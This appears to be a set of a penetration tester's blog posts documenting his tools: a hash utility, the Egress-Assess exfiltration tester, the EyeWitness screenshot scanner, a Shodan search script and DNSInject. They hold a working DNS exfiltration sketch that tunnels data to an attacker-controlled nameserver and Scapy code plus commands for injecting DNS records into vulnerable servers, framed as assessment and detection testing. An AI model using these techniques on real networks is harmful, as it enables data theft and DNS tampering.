Hasher Re-Write/Update

Github Repo: https://github.com/ChrisTruncer/Hasher

I have made some changes to Hasher, ideally for the better. Hasher was originally a single, large Python script used to hash plaintext strings and to compare a hash value against a plaintext string. Hasher still performs the same actions, generating hashes or comparing them with a plaintext string, but it has now been converted into a framework which allows myself, or anyone else, to easily add support for different hashes.

Usage is still essentially the same; however, there is no longer an interactive menu. Hasher is now completely command-line based.

Hasher Menu

To see a list of all hash-types that Hasher currently supports, simply run ./Hasher.py --list

HashTypes

Once you have the hash-type you want, generating a hash is fairly simple. For example, if you were looking to generate (-G) an MD5 hash for the string “password123”, you would do it this way:

./Hasher.py -G --plaintext password123 --hash-type md5

You should see output similar to the following:

MD5 Generated

Harmj0y provided me with a great idea for Hasher. He had a use case where he wanted Hasher to dump out all possible hashes for a specific plaintext string without having to generate each hash manually. I added the ability to generate every supported hash type from the information provided. To do this, you would run the following command:

./Hasher.py --plaintext password123 --hash-type all -G

When you run this, you should see output similar to the following:

Hasher All Output

Another capability of Hasher is that it can take a plaintext string and a hash, and then compare (-C) the two to ensure the plaintext matches the hash. This has been useful for me when needing to check if a hash and a string “equal” each other without submitting any of the information online. So, let’s continue the previous example. If you wanted to verify that the plaintext string “password123” matches the MD5 hash “482c811da5d5b4bc6d497ffa98491e38”, your command would look like this:

./Hasher.py -C --plaintext password123 --hash 482c811da5d5b4bc6d497ffa98491e38 --hash-type md5

True Comparison

For testing purposes, if the hash and plaintext string didn’t match up, it would look like the following:

False Hasher Comparison
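Under the hood, a comparison like this amounts to hashing the plaintext and checking the result against the supplied hash. A minimal illustration of the concept using Python's hashlib (this is just the idea, not Hasher's actual code):

    import hashlib

    plaintext = "password123"
    supplied_hash = "482c811da5d5b4bc6d497ffa98491e38"

    # Hash the plaintext and compare it to the supplied hash value
    print(hashlib.md5(plaintext.encode()).hexdigest() == supplied_hash)  # True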

 

Hash Module Development

Adding support for new hash types is significantly easier now. Every *.py file within the “hash_ops” folder is automatically picked up and parsed by Hasher. Within the hash_ops folder is a text file called “hash_template.txt”. To add a new hash-type, simply copy the template file and rename it with a .py extension. There are only two required methods within each module:

  • __init__ – This method needs to contain a self.hash_type attribute, which is what the user specifies on the command line to select a specific hash. Any other information within the __init__ method is optional.
  • generate – The generate method is called by Hasher to generate a hash.  This method has complete access to all options passed in from the command line by the user.  It must return the hash of the plaintext string.

For a sample, this is what the md5 module looks like:

Hasher MD5 Updated
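In code form, a module following the template might look roughly like the sketch below. The class name and the way the command line options are accessed are illustrative assumptions; only the self.hash_type attribute and the generate method are required, as described above.

    import hashlib

    class HashGen:

        def __init__(self):
            # Required: the value the user passes with --hash-type
            self.hash_type = "md5"

        def generate(self, cli_options):
            # cli_options is assumed to expose the parsed command line options,
            # including the --plaintext value; the real attribute name may differ
            return hashlib.md5(cli_options.plaintext.encode()).hexdigest()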

Hopefully, this helps explain the minor usability changes to Hasher, and elaborates on how it’s now easier to add support for new hashes.  If anyone has any questions, feel free to reach out to me on twitter (@ChrisTruncer) or in #Veil on Freenode!

Exfiltrate Data via DNS with Egress-Assess

Egress-Assess Repo: https://github.com/ChrisTruncer/Egress-Assess

DNS is a channel that can usually be used to exfiltrate data out of a network. Even when the network you are operating in requires authenticating to a proxy before data can leave, users can typically make DNS requests, which are forwarded on by the network’s local DNS servers. An attacker can use this normal DNS functionality to move data, C2 traffic, etc. out of the current network to a destination of their choosing, and Raphael Mudge has already weaponized this for use in Beacon with Cobalt Strike.

A new module has been added to Egress-Assess that allows you to use your system’s DNS server to exfiltrate data. This is different from the existing DNS module within Egress-Assess: the existing module sends DNS packets directly to the DNS server you specify, whereas the “dns_resolved” module uses your network’s own DNS server.

Using the existing network’s DNS server requires some setup. Raphael also has a blog post describing virtually the same configuration that is required to exfiltrate your data.

The first step I took was to create an A record, egress.christophertruncer.com, and point it to the server that will act as my endpoint for the data I am exfiltrating. Next, I created an NS record for the subdomain that I will use for exfiltrating data, and pointed the NS record to the A record I just created (egress.christophertruncer.com). My setup looks like the following:

DNS NS Record

Now, everything is set up and ready to go! To use this, my sample Egress-Assess command would be:

./Egress-Assess --client dns_resolved --datatype ssn --ip test.christophertruncer.com

Since egress.christophertruncer.com acts as the nameserver for test.christophertruncer.com, all requests using the “test” subdomain are sent to egress, sending all data over DNS to an endpoint I control.
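For reference, the general technique looks roughly like the following simplified sketch (not Egress-Assess’s actual implementation): the data is encoded into hostname labels under the delegated subdomain and resolved through the system’s normal resolver, which forwards each query out to the authoritative server.

    import socket

    def exfil_over_local_resolver(data, domain="test.christophertruncer.com", chunk=30):
        # Hex-encode the data and leak it as labels under the delegated subdomain
        encoded = data.encode().hex()
        for i in range(0, len(encoded), chunk):
            hostname = "{0}.{1}".format(encoded[i:i + chunk], domain)
            try:
                # The lookup fails, but the query is still forwarded by the local
                # DNS server out to the attacker-controlled nameserver
                socket.gethostbyname(hostname)
            except socket.error:
                pass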

If you have any questions on this, feel free to shoot a tweet my way or hop in #veil on Freenode!

How to Develop Egress-Assess Modules

This post documents how to create server, client, and datatype modules for Egress-Assess. I’ll cover the functions and attributes that the framework requires, and hopefully provide some other helpful info along the way.

First, some basic info before diving into the differences between the module types. All __init__ methods have access to every command line parameter passed in by the user. If a module requires information from the command line (hint: they all do in one way or another), you should declare attributes based on those command line options for each class instance within the __init__ method.

All module templates are currently .txt files. Once you’ve created your module and want to test or use it, rename it to a .py file within its respective folder.

Server Modules

servermoduletemplate

The first module type to discuss is the server module. Server modules allow the framework to be put into a “server mode”, which typically entails listening and waiting for a client to connect and transmit data to the server. A blank server module template is available at this link to use as a base for creating a server module.

The self.protocol attribute is the only required attribute for server modules.  This attribute is what is displayed to the user when typing --list-servers.  This is also the value that is used to identify and use the server module when used in conjunction with the --server flag.

The serve function is the only required function for the server class.  It is what is used by the framework to start the server.  You can create as many different functions as needed for the server class, but the serve function should be considered the “main” of the server module.
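Putting that together, a bare-bones server module might look something like this sketch. It is based only on the requirements above (self.protocol and serve); the actual template and framework wiring may differ.

    import socket

    class Server:

        def __init__(self, cli_options):
            # Required: the value shown by --list-servers and used with --server
            self.protocol = "tcp_demo"
            # Any other attributes pulled from the command line options are up to you
            self.port = 8080

        def serve(self):
            # The "main" of the server module: listen and receive the client's data
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listener.bind(("0.0.0.0", self.port))
            listener.listen(1)
            connection, _ = listener.accept()
            data = connection.recv(65535)
            print("[*] Received {0} bytes".format(len(data)))
            connection.close()
            listener.close()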

Client Modules

clientmoduletemplate

The client module will typically be used to transmit data over a specific protocol, vs. receiving any data.  A blank client module template can be found at this location.

The self.protocol attribute is the only required attribute for client modules. This attribute is what is displayed to the user when typing --list-clients. This is also the value that is used to identify and use the client module when used in conjunction with the --client flag.

The transmit function is the only required function for client modules. It is the function called by the framework to transmit data. The transmit function receives one argument (data_to_transmit), which is the data that the client is supposed to send to the server. Similar to server modules, the transmit function should be considered the “main” function of a client module. You can create as many additional functions as the client module needs, but the transmit function is what will be invoked by the framework.
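A matching client module could look roughly like the following sketch. The attribute name used for the server IP is an assumption about how the command line options are exposed.

    import socket

    class Client:

        def __init__(self, cli_options):
            # Required: the value shown by --list-clients and used with --client
            self.protocol = "tcp_demo"
            # Assumption: the framework exposes the --ip option this way
            self.server_ip = cli_options.ip

        def transmit(self, data_to_transmit):
            # The "main" of the client module: push the generated data to the server
            if not isinstance(data_to_transmit, bytes):
                data_to_transmit = data_to_transmit.encode()
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((self.server_ip, 8080))
            sock.sendall(data_to_transmit)
            sock.close()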

Datatype Modules

datatype template

Datatype modules are used to generate the data being exfiltrated. Currently, there are modules that generate social security numbers and credit card numbers. A blank datatype template can be found at this location.

The self.cli, self.description, and self.filetype attributes are required for datatype modules. The self.cli attribute is part of what is displayed when the user types --list-datatypes, and it is what uniquely selects the specific datatype with the --datatype flag. It should be short, since it is what the user passes in on the command line.

The self.description attribute can be used to better describe the datatype that is generated by the module.  This is also displayed when a user types --list-datatypes.  For example, the credit card module has “cc” as the self.cli attribute and “Credit Card Numbers” as the self.description attribute.

The self.filetype attribute is currently only used when exfiltrating data over FTP, but it is still required. It lets the framework know whether the data is text or binary. If text, keep the filetype attribute as “text”; otherwise, change it.

The generate_data function is required for datatype modules. It is what the framework invokes to generate the specific type of data requested by the user, and it must return all of the “data” generated. As an example, the social security number datatype module generates the requested number of social security numbers, and they are returned to the framework at the conclusion of the generate_data function.
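As a concrete (though illustrative) example, a datatype module built around these requirements might look like the sketch below; the real SSN module in the framework will differ in its details.

    import random

    class Datatype:

        def __init__(self, cli_options):
            self.cli = "ssn"                              # value used with --datatype
            self.description = "Social Security Numbers"  # shown by --list-datatypes
            self.filetype = "text"                        # "text" unless the data is binary

        def generate_data(self):
            # Generate fake SSN-formatted records and return them to the framework
            records = []
            for _ in range(100000):
                records.append("{0:03d}-{1:02d}-{2:04d}".format(
                    random.randint(1, 899),
                    random.randint(1, 99),
                    random.randint(1, 9999)))
            return "\n".join(records)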

Helper Functions

There are a few helper functions that are accessible to all modules. They live in the helpers.py file within the framework. A brief description of each (with a short usage sketch after the list):

  • helpers.randomNumbers(X) – returns “X” number of random numbers
  • helpers.ea_path() – returns the current path that Egress-Assess is in
  • helpers.writeout_text_data(incoming_data) – writes out a file containing the data passed into the function, and returns the name of the file
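For example, a module might lean on these helpers roughly like this. The import path and the return types are assumptions; only the helper names and behavior come from the list above.

    # Assumption: the helpers module is importable like this from inside a module
    from common import helpers

    # Build a blob of random digits, write it out, and report where it went
    data = "\n".join(str(helpers.randomNumbers(9)) for _ in range(1000))
    filename = helpers.writeout_text_data(data)   # returns the name of the written file
    print("[*] Data written to {0} in {1}".format(filename, helpers.ea_path()))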

 

I hope this helps explain how to write any of the currently available modules.  If anyone has any questions, feel free to hit me up on twitter or on IRC in #veil!

Egress-Assess – Testing your Egress Data Detection Capabilities

Github Link: https://github.com/ChrisTruncer/Egress-Assess

On a variety of occasions, our team will attempt to extract data from the network we are operating in and move it to another location for offline analysis.  Ideally, the customer that is being assessed will detect the data being extracted from their network and take preventive measures to stop further data loss.

When looking to copy data off of our target network, an attacker can do so over a variety of channels:

  • Download data through Cobalt Strike’s Beacon (over http or dns)
  • Download data through a Meterpreter Session
  • Manually moving data over FTP, SFTP, etc.

While we routinely inspect and analyze data from the customer environment in order to aid in lateral movement, we also provide customers data exfiltration testing as a service. Performing a data exfiltration exercise can be a valuable service to a customer who wants to validate if their egress detection capabilities can identify potentially sensitive data leaving their network.

I wanted to come up with an easy-to-use solution that would simulate the extraction of sensitive data from my machine to another. While planning the tool, I targeted a few protocols commonly used by attackers: FTP, HTTP, and HTTPS. To ensure that I could generate “sensitive” data that would be discovered during defensive operations, I needed to identify what multiple organizations would highly value. Two sensitive data types that would likely have detection signatures across organizations are social security numbers and credit card numbers, so I decided to target those forms of data in my proof of concept.

After spending a couple days piecing bits of code together, I am happy to release Egress-Assess.

Updated EgressAssess Help Menu

Egress-Assess can act as both the client and the server for the protocol you wish to simulate.  It supports exfiltration testing over HTTP, HTTPS, and FTP.  I envision the tool being used on an internal client and an external server where data would be passed over network boundaries. Once cloned from the repository, the dummy data can be transferred from one machine to another. 

To extract data over FTP, you would first start Egress-Assess’s FTP server by placing it in server mode with the ftp option and providing a username and password to use:

./Egress-Assess.py --server ftp --username testuser --password pass123

FTP Server Setup EA

Running that command should start something similar to the following:

FTP Server

This shows that the FTP server is up and running. With this going, all we need to do now is configure the client to connect to the server! This is simple, and can be done by telling Egress-Assess to act in client mode and use ftp, providing the username and password to use, the IP to connect to, and the datatype to transmit (in this case, social security numbers). Your output should look similar to the following…

./Egress-Assess.py --client ftp --username test --password pass --datatype ssn --ip 192.168.63.149

ftpclientupdated

Within the same directory as Egress-Assess, a “data” directory will be created; this is where all transmitted files are stored. At this point, the transfer over FTP is complete!

You can also do the same over HTTP or HTTPS.  Again, the first step will be starting one instance to act as the server in http mode.

./Egress-Assess.py --server http

HTTP Server Startup

This will now start a web server to listen on port 80.  The next step is to have your client generate new dummy data, and send it to the web server.  Only this time, we’ll change it up by specifying the approximate amount of data we want to generate.

By default, Egress-Assess will generate approximately 1 megabyte of data (either social security numbers or credit card numbers).  This amount can be changed using the “--data-size” flag.  If we want to send approximately 15 megabytes of credit card data to our web server over http, the command may look as follows…

./Egress-Assess.py --client http --data-size 15 --ip 192.168.63.149 --datatype cc

HTTP Client setup

http data sent

As you can see above, the file was transferred, and our web server received the file!

That about rounds out the current state of Egress-Assess. Future revisions will focus on making the tool more modular, so users can easily add support for new protocols and new data types for transfer. If there are any other requests, I’d love to hear them!

EyeWitness Now in Ruby!

The best way for me to learn a language is to give myself a task and force myself to write a script or program that carries it out. In this case, I had been wanting to change some aspects of EyeWitness, and decided that porting EyeWitness to Ruby would be a great way to make those changes and learn a new language. After @harmj0y suggested that I look into learning Ruby, I decided to dive in and get it done. Now, after about two months of working on it, I’m happy to say the EyeWitness Ruby port is ready for its initial release.

To view and download EyeWitness, head to my Github account, or click here!

I will continue to keep the Python version of EyeWitness available, as there are a few differences between the two versions of EyeWitness.  These differences are:

  • Screenshot Library – By adding an additional library for capturing screenshots, the user can switch between the two in the event that one library encounters an issue when capturing select websites.
    • The Python version of EyeWitness uses Ghost to take screenshots of websites.  One of the benefits of this is that it can run headlessly.  However, I have seen an issue where, when given 3000+ websites, Ghost can freeze.  Also, Robin Wood (@digininja) pointed out that EyeWitness can completely crash while screenshotting websites, which looks to be due to a potential file descriptor leak within Ghost.  Even though I rarely hit these issues, I still wanted an alternative, and one has been implemented in the Ruby version.
    • The Ruby version uses Selenium for capturing screenshots.  Specifically, Selenium-WebDriver will start up an instance of your web browser (Firefox by default) and use it to navigate to and screenshot web pages.  For this first release, the Ruby version ONLY supports Firefox (or a fork like Iceweasel).  Future releases will support other browsers, such as Chrome.
  • User Agent Switching
    • The Ruby version of EyeWitness does not currently have the ability to dynamically switch user agents for every URL and perform the same comparison checks that the Python version can carry out.  This is because EyeWitness would have to instantiate a new selenium-webdriver object for every user agent, and that takes place in the form of a new web browser opening up.  I believe it would be more of a hassle/distraction to have a large number of web browsers open, so I have not implemented it in the Ruby version.  However, if this is needed, you can still use the user agent switching functionality within the Python version.
  • File Input
    • The Ruby version of EyeWitness requires you to specify the file type you are using as input.  If using Nmap XML output for EyeWitness, you will have to use the --nmap flag; for Nessus files, the --nessus flag.
  • Skip Sorting
    • The Ruby version has a --skip-sort flag.  This tells EyeWitness not to group similar pages together, and to write out the report as it goes, rather than writing the report at the end after sorting all pages.

These are the major differences between the two versions for the time being. I personally believe the Ruby implementation of EyeWitness will be better to use for assessments. If you encounter any issues, please be sure to report them to me!

Thanks!

EyeWitness Usage Guide

NOTE: This post is now out of date – check this for the latest info – https://www.christophertruncer.com/eyewitness-2-0-release-and-user-guide/

I originally released EyeWitness in February in what I thought was a pretty functional state. When released, EyeWitness came in at about 400 lines of code. Since February, it has had multiple new features added to it (which I will go over in this post), and its code base has expanded to about 1600 lines of code. I’d like this post to act as a usage guide covering all the normal usage scenarios that I can think of.

I’ll start off by describing how I normally use EyeWitness. I typically call EyeWitness, provide it a text file (with each URL on a new line), and let it run. If I have a .nessus file or nmap.xml output, and it has more than 350 URLs, I’ll run EyeWitness with the --createtargets flag (explained below) and output all the targets to a single text file. I typically then split that file up into roughly 300 URLs per text file, and then either script up EyeWitness to run one scan after another, or run scans simultaneously. However, different situations might call for EyeWitness to be used in a different manner, so hopefully this usage guide can help explain all of its features.

Python:

The bare bones, and likely most common, use of EyeWitness is to provide a single URL, or multiple URLs within a file for EyeWitness to screenshot and generate a report.  To provide a single URL, just use the --single flag as follows:
Single URL Scan

EyeWitness also accepts files for providing the URLs.  The file can be provided in the following formats:

  • Single text file with a URL on each line
  • Nmap XML output
  • .Nessus file
  • amap file output
To perform a scan using any of these filetypes, just provide the -f flag as follows:
File Input Scan

By default, EyeWitness will attempt to screenshot each website with a max timeout of 7 seconds. If it takes longer than 7 seconds to render the website, EyeWitness will skip to the next URL. If you wish to change the timeout, use the -t flag and set it to the max number of seconds you want EyeWitness to wait for a website to render. Set Timeout

Once EyeWitness has finished navigating to all URLs and has generated a report, it outputs the report to the same directory it is in, naming the report folder based on the date and time the scan ran. If you want to change the directory name that EyeWitness outputs its report to, use the -d flag and provide a name. When using the -d flag, you can provide just a name, and EyeWitness will create the report folder with that name in the same directory as EyeWitness. You can also provide the full path to a directory, and EyeWitness will create the report folder at that location (just make sure you have the proper write permissions).

Directory name change Full Path report

Sorted reporting was a feature brought up to me by Jason Frank (@jasonjfrank) as something that would be helpful when reviewing the EyeWitness report.  If we had a way to make EyeWitness analyze the different web applications, and group similar web apps together, then it would be easy to quickly sort through/review the groups you want to target.  We envisioned similar printers, mirrored web pages, etc. all grouped together within the report.  Lucky for us, Rohan Vazarkar (@cptjesus) worked on adding this feature in.  His pull request was merged in on April 22nd, and EyeWitness will now attempt to sort all results based off of their title within each report generated.

The --localscan option was added based on a request from David McGuire (@davidpmcguire). We wanted a way to perform some basic port scanning for web servers once a machine has been compromised. Currently, one way to do it is to drop Nmap on the compromised machine, but if we did that, we’d have to install WinPcap on the machine, which requires admin rights. Instead of this, you can drop the Windows EyeWitness binary and provide the --localscan option with a CIDR range to scan. EyeWitness will then try to find any IP listening on 80, 443, 8080, and 8443 within the provided range. All live hosts listening on any of those ports will be added to a file that can be fed back into EyeWitness.

Localscan Portscanning
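The check itself is conceptually just a TCP connect scan against those four ports. A rough sketch of the idea (not EyeWitness’s actual code, and the function name is made up for illustration):

    import socket

    def find_web_servers(hosts, ports=(80, 443, 8080, 8443), timeout=1):
        # Return host:port pairs that accept a TCP connection on a common web port
        live = []
        for host in hosts:
            for port in ports:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(timeout)
                if sock.connect_ex((host, port)) == 0:
                    live.append("{0}:{1}".format(host, port))
                sock.close()
        return live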

The --createtargets option came about when I wanted to have EyeWitness just provide me a list of all web servers from the XML output of Nmap or Nessus. All web servers that EyeWitness finds within Nmap’s XML output or the .nessus file will be added to a file containing the target servers. Just provide the filename you want your targets file to be called.

createtargets

The user agent definition and cycling came about from working with Micah Hoffman (@webbreacher), Robin Wood (@digininja), and Chris John Riley (@ChrisJohnRiley). After a lot of discussion on how best to carry out user agent switching and comparison, the feature was added. First, you can simply provide the --useragent option, and it will use any string you provide as the user agent.

Single User Agent

You can also use the --cycle option along with either browser, mobile, crawler, scanner, misc, or all. When using this option, EyeWitness makes a baseline request. It will then make subsequent requests with user agents of the “type” you specified. If a subsequent request deviates “too much” from the baseline request, it will be added to the report, letting you know it was different from the baseline. The deviation is currently based on the length of the source code the web server provides to EyeWitness. By default, the deviation used to measure whether the requests are different is set to 50. To change this value, use the --difference flag and provide the new value to use.

Uacycle Cycling Set Difference Value
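Conceptually, the comparison works like the sketch below: re-request the page with each user agent and flag responses whose source length deviates from the baseline by more than the allowed difference. This is only an illustration of the logic, not EyeWitness’s code.

    import urllib.request

    def differs_from_baseline(url, user_agent, baseline_length, max_difference=50):
        # Request the page with the given user agent and compare response lengths
        request = urllib.request.Request(url, headers={"User-Agent": user_agent})
        source = urllib.request.urlopen(request, timeout=7).read()
        return abs(len(source) - baseline_length) > max_difference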

The --jitter option was one that was discussed at a NovaHackers meeting, and was also requested by @ruddawg26. To use this option, provide all the scan parameters you would normally provide, but add the --jitter parameter at the end along with the base number of seconds to deviate from. EyeWitness will then randomize the order of the URLs provided (via text or XML), and will also add a random delay between each request.

Jitter command Jitter scan

Finally, EyeWitness has a --open flag.  If you provide the --open flag, each URL passed into EyeWitness will also be opened up in a web browser.  Your command string might look similar to the following:

Open option

Ruby:

EyeWitnessRubyHelp

To generate a report for a single website, you need to use the -s or --single flag and provide the URL.

For file-based input, you will need to specify the filetype that you are providing. If giving just a normal text file with each URL on a new line, use the -f or --filename switch. If providing Nmap XML output, you’ll need to use the --nmap flag, and .nessus based input requires the --nessus flag.

The --skip-sort flag tells EyeWitness not to auto-group similar web pages together in the report. This can be helpful if you want to see report pages as they become available, instead of waiting until the very end, at the cost of similar pages not being grouped together.

The --no-dns flag is used when you want EyeWitness to find web servers via their IP address, not their DNS name, while parsing Nmap XML output.

This pretty much covers the features of EyeWitness.  If anyone has any questions, don’t hesitate to get in touch with me.  Also, please be sure to send any signatures you might have made!

ShodanSearch.py for Command Line Searches

By now, everyone should know what Shodan is and how to use it. It’s been out for a couple of years, has had multiple presentations given on it, and its capabilities have been integrated into at least a few reconnaissance tools out there (I believe). Shodan indexes a large amount of data, which is really helpful when searching for specific devices that happen to be connected to the internet.

In my case, I wanted to start adding signatures of different devices to EyeWitness, but I needed something that could quickly find the devices I wanted to write a signature for. Quite obviously, Shodan was my answer. Something else I wanted to do was stage multiple searches for different devices on Shodan. However, if I were to do this via the web interface, I would either have to perform one search after another, or manage a large number of tabs. I figured it would be easier to write a quick script that uses Shodan’s API (grab an API key here), as it would give me the flexibility to script up a large number of searches for review later on. This spawned a quick script to search Shodan, fittingly called ShodanSearch.

ShodanSearch

The simplest way to use this script is to call it with the -search option, and provide a string to search for.  This is just like searching for a string on the website.  So you could perform that search by typing something similar to the following:

./ShodanSearch.py -search Apache

And see something similar to this:

String Search

Another useful feature is searching Shodan by IP. This will return everything Shodan has indexed about the services available on the provided IP. There are three different ways to do this within ShodanSearch: the -ip, -cidr, and -f options. The -ip option performs a Shodan search for a single IP address, the -cidr option performs a search for every IP within the provided CIDR network range, and the -f option takes a file containing IPs and searches for all results on those IP addresses. Your searches could look similar to the following:

IP Search
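ShodanSearch is essentially a thin wrapper around Shodan’s Python library; if you want to script similar lookups yourself, the underlying API calls look roughly like this (illustrative usage of the shodan library, not the script’s exact code):

    import shodan  # pip install shodan

    api = shodan.Shodan("YOUR_API_KEY")

    # Same idea as ./ShodanSearch.py -search Apache
    results = api.search("Apache")
    for match in results["matches"]:
        print(match["ip_str"], match["port"])

    # Same idea as the -ip option: everything indexed for one address
    host = api.host("198.51.100.10")
    for service in host["data"]:
        print(service["port"], service.get("product"))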

These last few search options have been helpful when my team is on assessments, and we just want to script up a way to see what’s been publicly indexed about our targets.  Most of the time, it’s purely informational documents, but it’s something that has been valuable to our customers, so we provide it to them.

The only thing you’ll need to do to get up and running is add your Shodan API key to the script. After that, you should be good to go! Hope this helps, and feel free to get in touch with me with any questions you may have.

DNS Modification with DNSInject for Nessus Plugin 35372

Part of our normal pen test process, when performing an external assessment, is running a Nessus scan against the in-scope IP range(s) provided by our customer. We usually have this running in the background while carrying out our own analysis against the IP ranges. On a past assessment, we started with this same process. After some time went by, I checked the scan results we had so far and found an interesting vulnerability listed. Specifically, Nessus plugin 35372:

Nessus Plugin Info

Looking at the finding details, Nessus also provided the DNS zone that is vulnerable to modification. One thing I didn’t see, however, was an existing tool that allowed me to perform the record injection attack (see the note below). I had only seen a similar finding once before, on an internal assessment, and in that case I used dnsfun. I wasn’t sure dnsfun would work in this case, though, and I wanted to learn how to write a script that performs this attack myself, so I decided to do just that.

I started off by checking out RFC 2136 and learned that I would need to specify the zone I want to modify, along with the resource record itself that will be added or removed, while being sure to set the DNS packet’s opcode to 5 (UPDATE). This is something that can be easily done with Scapy.

Scapy Packet Definition

The great thing about Scapy is that you can define any specific packet attribute values you wish (TTL, record type, etc.), and the attributes that aren’t specified are automatically populated by Scapy with their proper values. The above code states that I want to send a DNS UDP packet to a specific destination, with the opcode set to 5 (UPDATE), and with the DNS-specific information set by the command line options provided by the user. And… that’s it!
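For reference, a dynamic update packet along these lines can be built in Scapy roughly as shown below. This is a sketch using the example values from the commands later in this post: the zone goes in the question section, and the record being added goes in the authority/update section.

    from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, send

    # Sketch of an RFC 2136 dynamic update packet; values match the example below
    packet = IP(dst="192.168.23.1") / UDP(dport=53) / DNS(
        opcode=5,                                    # 5 = UPDATE
        qd=DNSQR(qname="test.local", qtype="SOA"),   # zone section: the zone being modified
        ns=DNSRR(rrname="thisisa.test.local", type="A",
                 ttl=86400, rdata="192.168.23.5"))   # update section: the A record to add
    send(packet)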

I wrapped this up into a script that lets you either add or delete A records on a vulnerable name server pretty easily.  It’s called, simply, DNSInject.

DNSInject Options

To add a record with DNSInject.py, just specify the add action, provide the vulnerable name server, the A record you wish to create, and the IP it will point to.  Your command should look similar to the following:

./DNSInject.py --add -ns 192.168.23.1 -d thisisa.test.local -ip 192.168.23.5

Injection

To delete a record, you only need to provide the vulnerable name server, and the record to delete.  Again, your command could look similar to the following:

./DNSInject.py --delete -ns 192.168.23.1 -d thisisa.test.local

Deletion

To get and use DNSInject, just clone the following github repo – https://github.com/ChrisTruncer/PenTestScripts

Hope this helps, and if you have any questions, feel free to ask!

 

Note: Of course, after finishing this script, I discovered two other options which can help carry out this attack, so I wanted to be sure to mention them.  Scapy has a built-in function to both add and delete records, and you could also use nsupdate. Definitely be sure to check out those options as well!